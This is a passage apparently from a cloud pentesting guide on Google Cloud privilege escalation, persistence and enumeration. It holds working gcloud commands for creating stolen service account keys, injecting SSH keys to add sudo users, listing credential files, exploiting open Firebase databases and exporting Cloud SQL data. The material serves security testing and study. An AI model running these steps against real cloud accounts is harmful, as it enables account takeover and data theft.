You can find a script to automate the creation, exploit and cleaning of a
vuln environment here and a python script to abuse this privilege here.
For more information check the original research.
iam.serviceAccountKeys.create
This permission allows us to do something similar to the previous method,
but instead of an access token, we are creating a user-managed key for a
Service Account, which will allow us to access GCP as that Service
Account.
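A sketch with gcloud (SA_EMAIL is a placeholder); the generated key can then be activated as shown elsewhere in this book:
gcloud iam service-accounts keys create ./stolen-key.json --iam-account "$SA_EMAIL"
gcloud auth activate-service-account --key-file ./stolen-key.json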
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here and a python script to abuse this privilege here.
For more information check the original research.
iam.serviceAccounts.implicitDelega
tion
If you have the iam.serviceAccounts.implicitDelegation permission on a Service Account (B) that has the iam.serviceAccounts.getAccessToken permission on a third Service Account (C), then you can use implicit delegation to create a token for that third Service Account.
iam.serviceAccounts.signBlob
The iam.serviceAccounts.signBlob permission "allows signing of arbitrary payloads" in GCP. This means we can create an unsigned JWT of the SA and then send it as a blob to get the JWT signed by the SA we are targeting. For more information read this.
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here and a python script to abuse this privilege here and
here. For more information check the original research.
iam.serviceAccounts.signJwt
Similar to how the previous method worked by signing arbitrary payloads,
this method works by signing well-formed JSON web tokens (JWTs). The
difference with the previous method is that instead of making google sign
a blob containing a JWT, we use the signJWT method that already
expects a JWT. This makes it easier to use but you can only sign JWT
instead of any bytes.
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here and a python script to abuse this privilege here.
For more information check the original research.
iam.serviceAccounts.setIamPolicy
This permission allows you to add IAM policies to service accounts. You can abuse it to grant yourself the permissions you need to impersonate the service account. In the following example we are granting ourselves the roles/iam.serviceAccountTokenCreator role over the interesting SA:
gcloud iam service-accounts add-iam-policy-binding
"${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \
--member="user:<attacker-email>" \
--role="roles/iam.serviceAccountTokenCreator"
You can find a script to automate the creation, exploit and cleaning of a
vuln environment here.
iam.serviceAccounts.actAs
This means that as part of creating certain resources, you must "actAs"
the Service Account for the call to complete successfully. For example,
when starting a new Compute Engine instance with an attached Service
Account, you need iam.serviceAccounts.actAs on that Service Account.
This is because without that permission, users could escalate permissions
with fewer permissions to start with.
iam.serviceAccounts.getOpenIdToken
This permission can be used to generate an OpenID JWT. These are used to
assert identity and do not necessarily carry any implicit authorization
against a resource.
You can generate an OpenIDToken (if you have the access) with:
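The command is not shown here; a sketch of what it could look like (SA_EMAIL and the audience URL are placeholders):
gcloud auth print-identity-token --impersonate-service-account="$SA_EMAIL" --audiences="https://example.com"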
Some services that support authentication via this kind of tokens are:
You can find an example of how to create an OpenID token on behalf of a service account here.
cloudkms.cryptoKeyVersions.useToDe
crypt
You can use this permission to decrypt information with the key you have
this permission over.
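A sketch with gcloud (keyring, key and file names are placeholders):
gcloud kms decrypt \
    --location=global --keyring=<keyring> --key=<key> \
    --ciphertext-file=secret.enc --plaintext-file=secret.txt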
resourcemanager.folders.setIamPoli
cy
Like in the exploitation of iam.serviceAccounts.setIamPolicy , this
permission allows you to modify your permissions against any resource at
folder level. So, you can follow the same exploitation example.
resourcemanager.projects.setIamPol
icy
Like in the exploitation of iam.serviceAccounts.setIamPolicy , this
permission allows you to modify your permissions against any resource at
project level. So, you can follow the same exploitation example.
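For example, a sketch granting yourself a powerful role at project level (the member email is a placeholder):
gcloud projects add-iam-policy-binding $PROJECT_ID \
    --member="user:<attacker-email>" --role="roles/owner"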
run.services.create
iam.serviceaccounts.actAs
run.services.setIamPolicy OR run.routes.invoke
This method uses an included Docker image that must be built and hosted
to exploit correctly. The image is designed to tell Cloud Run to respond
with the Service Account's access token when an HTTP request is made.
The exploit script for this method can be found here and the Docker image
can be found here.
secretmanager.secrets.setIamPolicy
This gives you access to read the secrets from the secret manager.
Therefore, with an API key you can make that company pay for your use of
the API, but you won't be able to escalate privileges.
serviceusage.apiKeys.create
There is another method of authenticating with GCP APIs known as API
keys. By default, they are created with no restrictions, which means they
have access to the entire GCP project they were created in. We can
capitalize on that fact by creating a new API key that may have more
privileges than our own user. There is no official API for this, so a custom
HTTP request needs to be sent to https://apikeys.clients6.google.com/ (or
https://apikeys.googleapis.com/). This was discovered by monitoring the
HTTP requests and responses while browsing the GCP web console. For
documentation on the restrictions associated with API keys, visit this link.
The following screenshot shows how you would create an API key in the
web console.
With the undocumented API that was discovered, we can also create API
keys through the API itself.
The screenshot above shows a POST request being sent to retrieve a new
API key for the project.
serviceusage.apiKeys.list
Another undocumented API was found for listing API keys that have
already been created (this can also be done in the web console). Because
you can still see the API key's value after its creation, we can pull all the
API keys in the project.
The screenshot above shows that the request is exactly the same as before,
it just is a GET request instead of a POST request. This only shows a single
key, but if there were additional keys in the project, those would be listed
too.
GCP - Storage Privesc
Support HackTricks and get benefits!
storage
storage.objects.get
This permission allows you to download files stored inside GCP Storage. This will potentially allow you to escalate privileges because in some occasions sensitive information is saved there. Moreover, some GCP services store their information in buckets:
storage.objects.create ,
storage.objects.delete
In order to create a new object inside a bucket you need storage.objects.create and, according to the docs, you also need storage.objects.delete to modify an existing object.
A very common exploitation of buckets you can write to in the cloud is when the bucket is serving web server files: you might be able to store new code that will be used by the web application.
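A sketch of overwriting such an object with gsutil (bucket and object names are placeholders):
gsutil cp ./backdoored-file gs://<target-bucket>/<path-to-served-object>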
Moreover, several GCP services also store code inside buckets that is later executed:
storage.objects.setIamPolicy
You can grant yourself permission to abuse any of the previous scenarios of this section.
storage.buckets.setIamPolicy
For an example on how to modify permissions with this permission check
this page:
gcp-public-buckets-privilege-escalation.md
storage.hmacKeys.create
There is a feature of Cloud Storage, "interoperability", that provides a way for Cloud Storage to interact with storage offerings from other cloud providers, like AWS S3. As part of that, there are HMAC keys that can be created for both Service Accounts and regular users. We can escalate Cloud Storage permissions by creating an HMAC key for a higher-privileged Service Account.
HMAC keys belonging to your user cannot be accessed through the API and must be accessed through the web console, but what's nice is that both the access key and secret key are available at any point. This means we could take an existing pair and store them for backup access to the account.
HMAC keys belonging to Service Accounts can be accessed through the
API, but after creation, you are not able to see the access key and secret
again.
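A sketch of creating such a key with gsutil (the service account email is a placeholder); the returned access key and secret can then be used with S3-compatible tooling:
gsutil hmac create <service-account-email>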
Composer
Composer is Apache Airflow managed inside GCP. It has several
interesting features:
GCR
Google Container Registry stores the images inside buckets, if you
can write those buckets you might be able to move laterally to
where those buckets are being run.
cloudfunctions.functions.setIamPolicy
Modify the policy of a Cloud Function to allow yourself to invoke
it.
There are tens of resource types with this kind of permission; you can find all of them in https://cloud.google.com/iam/docs/permissions-reference searching for setIamPolicy.
*.create, *.update
These permissions can be very useful to try to escalate privileges in resources by creating a new one or updating an existing one. This kind of permissions is especially useful if you also have the permission iam.serviceAccounts.actAs over a Service Account and the resource you have .create/.update over can have a service account attached.
*ServiceAccount*
This permission will usually let you access or modify a Service Account
in some resource (e.g.: compute.instances.setServiceAccount). This could
lead to a privilege escalation vector, but it will depend on each case.
This agent monitors the metadata for changes. Inside the metadata there is a field with authorized SSH public keys. Therefore, when a new public SSH key appears in the metadata, the agent will authorize it in the user's .authorized_keys file and it will create a new user if necessary, adding it to sudoers.
The way the Google Guest Agent monitors for changes is through a call that retrieves all metadata values recursively (GET /computeMetadata/v1/?recursive=true).
Escape
ARP spoofing does not work on Google Compute Engine networks,
however, Ezequiel generated this modified version of rshijack that can be
used to inject a packet in the communication to inject the SSH user.
This modified version of rshijack allows passing the ACK and SEQ numbers as command-line arguments, saving time and allowing us to spoof a response before the real Metadata response comes. Moreover, this small Shell script returns a specially crafted payload that triggers the Google Guest Agent to create the user wouter, with our own public key in its .authorized_keys file. This script receives the ETag as a parameter since, by keeping the same ETag, the Metadata server won't immediately tell the Google Guest Agent that the metadata values were different on the next response, instead waiting the specified amount of seconds in timeout_sec.
To achieve the spoofing, you should watch requests to the Metadata server with tcpdump: tcpdump -S -i eth0 'host 169.254.169.254 and port 80' & waiting for a line that looks like this:
When you see that value, send the fake metadata with the correct ETag to rshijack:
And this should make the agent authorize that public key that will allow
you to connect via SSH with the private key.
References
https://www.ezequiel.tech/2020/08/dropping-shell-in.html
https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-
postgresql-vulnerabilities
Running gsutil ls from the command line returns nothing, as the service
account is lacking the storage.buckets.list IAM permission. However,
if you ran gsutil ls gs://instance82736-long-term-xyz-archive-0332893 you may find a complete filesystem backup, giving you clear-text
access to data that your local Linux account lacks.
You may be able to find this bucket name inside a script (in bash, Python,
Ruby...).
Custom Metadata
Administrators can add custom metadata at the instance and project level.
This is simply a way to pass arbitrary key/value pairs into an instance,
and is commonly used for environment variables and startup/shutdown
scripts.
Default service account: If the service account access scope is set to full access or at least is explicitly allowing access to the compute API, then this configuration is vulnerable to escalation. The default scope is not vulnerable.
Custom service account: When using a custom service account, one of the following IAM permissions is necessary to escalate privileges:
Although Google recommends not using access scopes for custom service
accounts, it is still possible to do so. You'll need one of the following access
scopes:
https://www.googleapis.com/auth/compute
https://www.googleapis.com/auth/cloud-platform
So, if you can modify custom instance metadata with your service
account, you can escalate to root on the local system by gaining SSH
rights to a privileged account. If you can modify custom project
metadata, you can escalate to root on any system in the current GCP
project that is running the accounts daemon.
Check the instance for existing SSH keys. Pick one of these users as they
are likely to have sudo rights.
Notice the slightly odd format of the public keys - the username is listed
at the beginning (followed by a colon) and then again at the end. We'll
need to match this format. Unlike normal SSH key operation, the username
absolutely matters!
Save the lines with usernames and keys in a new text file called
meta.txt .
Let's assume we are targeting the user alice from above. We'll generate
a new key for ourselves like this:
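The key-generation step is missing from this page; a sketch matching the scripted example further below:
ssh-keygen -t rsa -C "alice" -f ./key -P ""
cat ./key.pub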
Add your new public key to the file meta.txt imitating the format:
alice:ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQC/SQup1eHdeP1qWQedaL64vc7j7hUUtMM
vNALmiPfdVTAOIStPmBKx1eN5ozSySm5wFFsMNGXPp2ddlFQB5pYKYQHPwqRJp1
CTPpwti+uPA6ZHcz3gJmyGsYNloT61DNdAuZybkpPlpHH0iMaurjhPk0wMQAMJU
bWxhZ6TTTrxyDmS5BnO4AgrL2aK+peoZIwq5PLMmikRUyJSv0/cTX93PlQ4H+Mt
DHIvl9X2Al9JDXQ/Qhm+faui0AnS8usl2VcwLOw7aQRRUgyqbthg+jFAcjOtiuh
aHJO9G1Jw8Cp0iy/NE8wT0/tj9smE1oTPhdI+TXMJdcwysgavMCE8FGzZ alice
bob:ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQC2fNZlw22d3mIAcfRV24bmIrOUn8l9qgO
Gj1LQgOTBPLAVMDAbjrM/98SIa1NainYfPSK4oh/06s7xi5B8IzECrwqfwqX0Z3
VbW9oQbnlaBz6AYwgGHE3Fdrbkg/Ew8SZAvvvZ3bCwv0i5s+vWM3ox5SIs7/W4v
RQBUB4DIDPtj0nK1d1ibxCa59YA8GdpIf797M0CKQ85DIjOnOrlvJH/qUnZ9fbh
aHzlo2aSVyE6/wRMgToZedmc6RzQG2byVxoyyLPovt1rAZOTTONg2f3vu62xVa/
PIk4cEtCN3dTNYYf3NxMPRF6HCbknaM9ixmu3ImQ7+vG3M+g9fALhBmmF bob
alice:ssh-rsa
AAAAB3NzaC1yc2EAAAADAQABAAABAQDnthNXHxi31LX8PlsGdIF/wlWmI0fPzuM
rv7Z6rqNNgDYOuOFTpM1Sx/vfvezJNY+bonAPhJGTRCwAwytXIcW6JoeX5NEJsv
EVSAwB1scOSCEAMefl0FyIZ3ZtlcsQ++LpNszzErreckik3aR+7LsA2TCVBjdlP
uxh4mvWBhsJAjYS7ojrEAtQsJ0mBSd20yHxZNuh7qqG0JTzJac7n8S5eDacFGWC
xQwPnuINeGoacTQ+MWHlbsYbhxnumWRvRiEm7+WOg2vPgwVpMp4sgz0q5r7n/l7
YClvh/qfVquQ6bFdpkVaZmkXoaO74Op2Sd7C+MBDITDNZPpXIlZOf4OLb alice
Now, you can re-write the SSH key metadata for your instance with the
following command:
gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt
You can follow the same process as above, but just make up a new
username. This user will be created automatically and given rights to
sudo . Scripted, the process would look like this:
# define the new account username
NEWUSER="definitelynotahacker"
# create a key
ssh-keygen -t rsa -C "$NEWUSER" -f ./key -P ""
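The rest of the scripted process is not shown here; a sketch of how it could continue (instance name and IP are placeholders), reusing the add-metadata command shown above:
# Build the metadata entry and push it
echo "$NEWUSER:$(cat ./key.pub)" > ./meta.txt
gcloud compute instances add-metadata [INSTANCE] --metadata-from-file ssh-keys=meta.txt
# Connect with the new user
ssh -i ./key "$NEWUSER"@<instance-ip>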
This will generate a new SSH key, add it to your existing user, and add
your existing username to the google-sudoers group, and start a new
SSH session. While it is quick and easy, it may end up making more
changes to the target system than the previous methods.
We can expand upon those a bit by applying SSH keys at the project level, granting you permission to SSH into a privileged account for any instance that has not explicitly chosen the "Block project-wide SSH keys" option:
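A sketch of applying the same meta.txt project-wide:
gcloud compute project-info add-metadata --metadata-from-file ssh-keys=meta.txt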
If you're really bold, you can also just type gcloud compute ssh [INSTANCE] and let gcloud generate and push a key for your current user automatically.
OS Login is enabled at the project or instance level using the metadata key
of enable-oslogin = TRUE .
Unlike managing only with SSH keys, these permissions allow the
administrator to control whether or not sudo is granted.
If your service account has these permissions, you can simply run the gcloud compute ssh [INSTANCE] command to connect manually as the service account. Two-factor is only enforced when using user accounts, so that should not slow you down even if it is assigned as shown above.
Similar to using SSH keys from metadata, you can use this strategy to
escalate privileges locally and/or to access other Compute Instances on
the network.
OS Patching
Depending on the privileges associated with the service account you have
access to, if it has either the osconfig.patchDeployments.create or
osconfig.patchJobs.exec permissions you can create a patch job or
deployment. This will enable you to move laterally in the environment and
gain code execution on all the compute instances within a project.
Now check the permissions offered by the role; if it has access to either the patch deployment or job, continue.
gcloud iam roles describe roles/<role name> | grep -E
'(osconfig.patchDeployments.create|osconfig.patchJobs.exec)'
If you want to manually exploit this you will need to create either a patch
job or deployment for a patch job run:
gcloud compute os-config patch-jobs execute --file=patch.json
First, find what gcloud config directories exist in users' home folders.
You can manually inspect the files inside, but these are generally the ones
with the secrets:
~/.config/gcloud/credentials.db
~/.config/gcloud/legacy_credentials/[ACCOUNT]/adc.json
~/.config/gcloud/legacy_credentials/[ACCOUNT]/.boto
~/.credentials.json
Now, you have the option of looking for clear text credentials in these files
or simply copying the entire gcloud folder to a machine you control and
running gcloud auth list to see what accounts are now available to you.
AI Platform Enum
Cloud Functions, App Engine & Cloud Run Enum
Compute Instances Enum
Compute Network Enum
Containers & GKE Enum
Databases Enum
DNS Enum
Filestore Enum
KMS & Secrets Management
Pub/Sub
Source Repositories
Stackdriver Enum
Storage Enum
There are a few areas here you can look for interesting information like
models and jobs.
# Models
gcloud ai-platform models list
gcloud ai-platform models describe <model>
gcloud ai-platform models get-iam-policy <model>
# Jobs
gcloud ai-platform jobs list
gcloud ai-platform jobs describe <job>
# List functions
gcloud functions list
Privesc
In the following page you can check how to abuse cloud function
permissions to escalate privileges:
############################
# Run this tool to find Cloud Functions that permit unauthenticated invocations
# anywhere in your GCP organization.
# Enjoy!
############################
if [ -z "$enabled" ]; then
continue
fi
if [ -z "$all_auth" ]
then
:
else
echo "[!] Open to all authenticated users: $proj:
$func"
fi
done
done
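The script body is truncated above; the core of the check is roughly the following (single-project sketch; newer/gen2 functions may also require a --region flag):
proj=<project-id>
for func in $(gcloud functions list --project "$proj" --format="value(name)"); do
    acl=$(gcloud functions get-iam-policy "$func" --project "$proj" 2>/dev/null)
    echo "$acl" | grep -q allUsers && echo "[!] Open to all users: $proj: $func"
    echo "$acl" | grep -q allAuthenticatedUsers && echo "[!] Open to all authenticated users: $proj: $func"
done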
App Engine Configurations
Google App Engine is another "serverless" offering for hosting
applications, with a focus on scalability. As with Cloud Functions, there is
a chance that the application will rely on secrets that are accessed at
run-time via environment variables. These variables are stored in an
app.yaml file which can be accessed as follows:
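gcloud itself may expose those variables: describing a deployed version usually includes its envVariables (a sketch; service and version names are placeholders):
gcloud app services list
gcloud app versions list --service <service>
gcloud app versions describe <version> --service <service> | grep -A 20 envVariables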
The access to this web server might be public or managed via IAM
permissions:
gcp-run-privesc.md
############################
# Run this tool to find Cloud Run services that permit unauthenticated
# invocations anywhere in your GCP organization.
# Enjoy!
############################
if [ -z "$enabled" ]; then
continue
fi
if [ -z "$all_users" ]
then
:
else
echo "[!] Open to all users: $proj: $run"
fi
if [ -z "$all_auth" ]
then
:
else
echo "[!] Open to all authenticated users: $proj:
$run"
fi
done
done
References
https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-
privileges-in-google-cloud-platform/#reviewing-stackdriver-logging
gcp-local-privilege-escalation-ssh-pivoting.md
Privesc
In the following page you can check how to abuse compute permissions
to escalate privileges:
gcp-compute-privesc.md
Metadata
For info about how to access the metadata endpoint from a machine check:
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-
forgery/cloud-ssrf#6440
Administrators can add custom metadata at the instance and project level.
This is simply a way to pass arbitrary key/value pairs into an instance,
and is commonly used for environment variables and startup/shutdown
scripts. This can be obtained using the describe method from a command
in the previous section, but it could also be retrieved from the inside of the
instance accessing the metadata endpoint.
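For instance, from inside the instance (standard metadata endpoint, no extra assumptions):
# dump everything recursively
curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=json"
# only the custom project-level attributes
curl -s -H "Metadata-Flavor: Google" "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true"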
You can then export the virtual disks from any image in multiple formats.
The following command would export the image test-image in qcow2
format, allowing you to download the file and build a VM locally for
further investigation:
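A sketch of that export (assuming a bucket you can write to; the export runs through Cloud Build, so the relevant APIs must be enabled):
gcloud compute images export --image test-image \
    --export-format qcow2 \
    --destination-uri gs://<your-bucket>/test-image.qcow2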
# List subnetworks
gcloud compute networks subnets list
gcloud compute networks subnets get-iam-policy <name> --region
<region>
gcloud compute networks subnets describe <name> --region
<region>
You can easily find compute instances with open firewall rules with
https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp_firewall_enum
VPC, Networks & Firewalls in GCP
Compute Instances are connected to VPCs (Virtual Private Clouds). In GCP
there aren't security groups, there are VPC firewalls with rules defined at
this network level but applied to each VM Instance. By default every
network has two implied firewall rules: allow outbound and deny
inbound.
When a GCP project is created, a VPC called default is also created, with
the following firewall rules:
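You can review them with something like the following (the default VPC usually ships with rules named default-allow-*):
gcloud compute firewall-rules list
gcloud compute firewall-rules describe default-allow-internal
gcloud compute firewall-rules describe default-allow-ssh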
As you can see, firewall rules tend to be more permissive for internal IP
addresses. The default VPC permits all traffic between Compute Instances.
When attacking from the internet, the default rules don't provide any quick
wins on properly configured machines. It's worth checking for password
authentication on SSH and weak passwords on RDP, of course, but that's a
given.
What we are really interested in is other firewall rules that have been
intentionally applied to an instance. If we're lucky, we'll stumble over an
insecure application, an admin interface with a default password, or
anything else we can exploit.
Network tags
Service accounts
All instances within a VPC
We've automated this completely using this python script which will export
the following:
CSV file showing instance, public IP, allowed TCP, allowed UDP
nmap scan to target all instances on ports ingress allowed from the
public internet (0.0.0.0/0)
masscan to target the full TCP range of those instances that allow ALL
TCP ports from the public internet (0.0.0.0/0)
References
https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-
privileges-in-google-cloud-platform/
Enumeration
Privilege Escalation
gcp-compute-privesc.md
Persistence by OS Patching
If you gain access to a service account (either through credentials or via the
default service account of a compute instance/cloud function) that has the
osconfig.patchDeployments.create permission, you can create a patch
deployment. This deployment will run a script on Windows and Linux
compute instances at a defined interval under the context of the OS Config
agent.
Automated tooling such as patchy exists to detect and exploit the presence
of lax permissions on a compute instance or cloud function.
If you want to manually install the patch deployment, run the following
gcloud command (a patch boilerplate can be found here):
gcloud compute os-config patch-deployments create my-update --
file=patch.json
Reference
https://blog.raphael.karger.is/articles/2022-08/GCP-OS-Patching
Privesc
In the following page you can check how to abuse container permissions
to escalate privileges:
gcp-container-privesc.md
Node Pools
These are the pools of machines (nodes) that form the Kubernetes clusters.
Privesc
In the following page you can check how to abuse composer permissions
to escalate privileges:
gcp-composer-privesc.md
Kubernetes
For information about what is Kubernetes check this page:
kubernetes-security
First, you can check to see if any Kubernetes clusters exist in your project.
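A couple of likely commands for that (cluster name and zone are placeholders):
gcloud container clusters list
gcloud container clusters get-credentials <cluster-name> --zone <zone>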
Once this is set up, you can try the following command to get the cluster
configuration.
kubectl cluster-info
https://www.4armed.com/blog/hacking-kubelet-on-gke/
https://www.4armed.com/blog/kubeletmein-kubelet-hacking-tool/
https://rhinosecuritylabs.com/cloud-security/kubelet-tls-bootstrap-
privilege-escalation/
However, the technique abused the fact that with the metadata credentials
it was possible to generate a CSR (Certificate Signing Request) for a new
node, which was automatically approved. In my tests I checked that those
requests aren't automatically approved anymore, so I'm not sure if this
technique is still valid.
curl -v -k http://10.124.200.1:10255/pods
Databases:
Bigquery Enum
Bigtable Enum
Firebase Enum
Firestore Enum
Memorystore (redis & memcache) Enum
Spanner Enum
SQL Enum
bq ls -p #List projects
bq ls -a #List all datasets
bq ls #List datasets from current project
bq ls <dataset_name> #List tables inside the DB
# Show information
bq show "<proj_name>:<dataset_name>"
bq show "<proj_name>:<dataset_name>.<table_name>"
bq show --encryption_service_account
# Cloud Bigtable
gcloud bigtable instances list
gcloud bigtable instances describe <instance>
gcloud bigtable instances get-iam-policy <instance>
## Clusters
gcloud bigtable clusters list
gcloud bigtable clusters describe <cluster>
## Backups
gcloud bigtable backups list --instance <INSTANCE>
gcloud bigtable backups describe --instance <INSTANCE>
<backupname>
gcloud bigtable backups get-iam-policy --instance <INSTANCE>
<backupname>
## Hot Tables
gcloud bigtable hot-tablets list
## App Profiles
gcloud bigtable app-profiles list --instance <INSTANCE>
gcloud bigtable app-profiles describe --instance <INSTANCE>
<app-prof>
Unauthenticated Enum
Some Firebase endpoints could be found in mobile applications. It is
possible that the Firebase endpoint used is badly configured, granting
everyone privileges to read (and write) it.
1. Get the APK of the app; you can use any tool to extract the APK from the device for this PoC. You can use “APK Extractor” https://play.google.com/store/apps/details?id=com.ext.ui&hl=e
2. Decompile the APK using apktool to extract the source code from the APK (see the command sketch after this list).
3. Go to res/values/strings.xml and search for the “firebase” keyword
4. You may find something like this URL: “https://xyz.firebaseio.com/”
5. Next, go to the browser and navigate to the found URL: https://xyz.firebaseio.com/.json
6. Two types of responses can appear:
i. “Permission Denied”: This means that you cannot access it, so it's well configured
ii. “null” response or a bunch of JSON data: This means that the database is public and you at least have read access.
i. In this case, you could check for writing privileges; an exploit to test writing privileges can be found here: https://github.com/MuhammadKhizerJaved/Insecure-Firebase-Exploit
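A command sketch of steps 2-5 (assuming the APK is app.apk and apktool is installed):
apktool d app.apk -o app_src
grep -r "firebaseio.com" app_src/res/values/strings.xml
# check if the database is exposed
curl "https://xyz.firebaseio.com/.json"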
Alternatively, you can use Firebase Scanner, a python script that automates
the task above as shown below:
python FirebaseScanner.py -f
<commaSeperatedFirebaseProjectNames>
Authenticated Enum
If you have credentials to access the Firebase database you can use a tool
such as Baserunner to access more easily the stored information. Or a
script like the following:
#Taken from https://blog.assetnote.io/bug-bounty/2020/02/01/expanding-attack-surface-react-native/
import pyrebase
config = {
    "apiKey": "FIREBASE_API_KEY",
    "authDomain": "FIREBASE_AUTH_DOMAIN_ID.firebaseapp.com",
    "databaseURL": "https://FIREBASE_AUTH_DOMAIN_ID.firebaseio.com",
    "storageBucket": "FIREBASE_AUTH_DOMAIN_ID.appspot.com",
}
firebase = pyrebase.initialize_app(config)
db = firebase.database()
print(db.get())
To test other actions on the database, such as writing to the database, refer
to the Pyrebase documentation which can be found here.
If, for example, inside an iOS app's Info.plist you find the Firebase API Key and App ID, you can query the Remote Config API:
Request
curl -v -X POST
"https://firebaseremoteconfig.googleapis.com/v1/projects/6123456789
09/namespaces/firebase:fetch?key=AIzaSyAs1[...]" -H "Content-Type:
application/json" --data '{"appId":
"1:612345678909:ios:c212345678909876", "appInstanceId": "PROD"}'
References
https://blog.securitybreached.org/2020/02/04/exploiting-insecure-
firebase-database-bugbounty/
https://medium.com/@danangtriatmaja/firebase-database-takover-
b7929bbb62e1
# Memcache
gcloud memcache instances list --region <region>
gcloud memcache instances describe <INSTANCE> --region <region>
# You should try to connect to the memcache instances to access
the data
# Redis
gcloud redis instances list --region <region>
gcloud redis instances describe <INSTANCE> --region <region>
gcloud redis instances export gs://my-bucket/my-redis-
instance.rdb my-redis-instance --region=us-central1
# Cloud Spanner
## Instances
gcloud spanner instances list
gcloud spanner instances describe <INSTANCE>
gcloud spanner instances get-iam-policy <INSTANCE>
## Databases
gcloud spanner databases list --instance <INSTANCE>
gcloud spanner databases describe --instance <INSTANCE>
<db_name>
gcloud spanner databases get-iam-policy --instance <INSTANCE>
<db_name>
gcloud spanner databases execute-sql --instance <INSTANCE> --
sql <sql> <db_name>
## Backups
gcloud spanner backups list --instance <INSTANCE>
gcloud spanner backups get-iam-policy --instance <INSTANCE>
<backup_name>
## Instance Configs
gcloud spanner instance-configs list
gcloud spanner instance-configs describe <name>
If you find any of these instances in use with a public IP, you could try to
access them from the internet as they might be misconfigured and
accessible.
# Cloud SQL
gcloud sql instances list
gcloud sql databases list -i <INSTANCE>
gcloud sql databases describe -i <INSTANCE> <DB>
gcloud sql backups list -i <INSTANCE>
gcloud sql backups describe -i <INSTANCE> <DB>
# Steal data
## Export
gcloud sql export sql <DATABASE_INSTANCE>
gs://<CLOUD_STORAGE_BUCKET>/cloudsql/export.sql.gz --database
<DATABASE_NAME>
## Clone
gcloud sql instances clone <SOURCE> <DESTINATION>
## Backup
gcloud sql backups restore BACKUP_ID --restore-instance
<RESTORE_INSTANCE>
gcloud sql instances clone restore-backup <SOURCE>
<DESTINATION>
## Users abuse
gcloud sql users list -i <INSTANCE>
gcloud sql users create SUPERADMIN -i <INSTANCE>
gcloud sql users set-password <USERNAME> -i <INSTANCE> --
password <PWD>
Exfiltrate DB data
As an example, you can follow Google's documentation to exfiltrate a
Cloud SQL database.
# Policies
## A response policy is a collection of selectors that apply to
queries made against one or more virtual private cloud
networks.
gcloud dns response-policies list
## DNS policies control internal DNS server settings. You can
apply policies to DNS servers on Google Cloud Platform VPC
networks you have access to.
gcloud dns policies list
If you find a filestore available in the project, you can mount it from within
your compromised Compute Instance. Use the following command to see if
any exist.
# Instances
gcloud filestore instances list
gcloud filestore instances describe --zone <zone> <name>
# Backups
gcloud filestore backups list
gcloud filestore backups describe --region <region> <backup>
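If one exists, a sketch of mounting it over NFS from a Compute Instance in the same VPC (the IP and share name come from the describe output):
sudo apt-get install -y nfs-common   # or the equivalent package for the distro
sudo mkdir -p /mnt/filestore
sudo mount <filestore-ip>:/<share-name> /mnt/filestore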
# Policies
gcloud organizations get-iam-policy <org_id>
gcloud resource-manager folders get-iam-policy
gcloud projects get-iam-policy <project-id>
# Principals
## Group Members
gcloud identity groups memberships search-transitive-memberships --group-email <group_email>
# MISC
## Testable permissions in resource
gcloud iam list-testable-permissions --filter "NOT apiDisabled:
true"
## Grantable roles to a resource
gcloud iam list-grantable-roles <project URL>
gcp-iam-privesc.md
There are three ways in which you can impersonate another service
account:
You can use the following command to grant a user the primitive role of
Editor to your existing project:
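For example (project id and user email are placeholders):
gcloud projects add-iam-policy-binding <project-id> \
    --member user:<attacker@email.com> --role roles/editor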
If you succeeded here, try accessing the web interface and exploring from
there.
This is the highest level you can assign using the gcloud tool.
Org Policies
The IAM policies indicate the permissions principals have over resources via
roles, which are assigned granular permissions. Organization policies
restrict how those services can be used or which features are enabled or
disabled. They help improve the least privilege of each resource in the
GCP environment.
There are many more constraints that give you fine-grained control of your
organization's resources. For more information, see the list of all
Organization Policy Service constraints.
Privesc
In the following page you can check how to abuse org policies
permissions to escalate privileges:
gcp-orgpolicy-privesc.md
If you have permissions to list the secrets, this is how you can access them:
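For example (assuming a secret with at least one version):
gcloud secrets list
gcloud secrets versions access 1 --secret <secret_name>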
Note that changing a secret entry will create a new version, so it's worth
changing the 1 in the command above to a 2 and so on.
Privesc
In the following page you can check how to abuse secretmanager
permissions to escalate privileges:
gcp-secretmanager-privesc.md
References
https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-
privileges-in-google-cloud-platform/#reviewing-stackdriver-logging
# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
However, you may have better results asking for a larger set of data,
including older messages. This has some prerequisites and could impact
applications, so make sure you really know what you're doing.
Pub/Sub Lite
Pub/Sub Lite is a messaging service with zonal storage. Pub/Sub Lite
costs a fraction of Pub/Sub and is meant for high volume streaming
pipelines and event-driven system where low cost is the primary
consideration.
# lite-topics
gcloud pubsub lite-topics list
gcloud pubsub lite-topics describe <topic>
gcloud pubsub lite-topics list-subscriptions <topic>
# lite-subscriptions
gcloud pubsub lite-subscriptions list
gcloud pubsub lite-subscriptions describe <subscription>
# lite-reservations
gcloud pubsub lite-reservations list
gcloud pubsub lite-reservations describe <topic>
gcloud pubsub lite-reservations list-topics <topic>
# lite-operations
gcloud pubsub lite-operations list
gcloud pubsub lite-operations describe <topic>
The service account for a Compute Instance only needs WRITE access to
enable logging on instance actions, but an administrator may mistakenly
grant the service account both READ and WRITE access. If this is the
case, you can explore logs for sensitive data.
gcloud logging provides tools to get this done. First, you'll want to see what
types of logs are available in your current project.
# List logs
gcloud logging logs list
NAME
projects/REDACTED/logs/OSConfigAgent
projects/REDACTED/logs/cloudaudit.googleapis.com%2Factivity
projects/REDACTED/logs/cloudaudit.googleapis.com%2Fsystem_event
projects/REDACTED/logs/bash.history
projects/REDACTED/logs/compute.googleapis.com
projects/REDACTED/logs/compute.googleapis.com%2Factivity_log
# Read logs
gcloud logging read [FILTER]
